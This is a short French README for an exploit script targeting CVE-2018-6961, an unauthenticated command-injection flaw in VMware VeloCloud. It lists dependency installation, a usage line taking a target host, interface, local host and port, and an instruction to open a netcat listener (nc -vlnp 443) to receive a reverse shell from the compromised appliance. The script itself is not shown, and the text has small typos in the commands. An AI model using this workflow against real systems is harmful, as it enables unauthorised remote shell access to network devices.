
veloCloud VMWare - Vulnérabilité
CVE-2018-6961 - VULNÉRABILITÉ D'INJECTION DE COMMANDES SANS AUTHENTIFICATION
Cet exploit fonctionne sous Python 2.7 - Non testé sous d'autres versions
1) Installer les dépendances
pip install request
Si pip n'est pas installé, exécutez simplement
apt-get install python-pip
2) Utilisation
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploitation en cours...................
3) N'oubliez pas de configurer netcat sur un autre terminal
nc -vlnp 443
À FAIRE --améliorer le script pour exécuter netcat sur le même terminal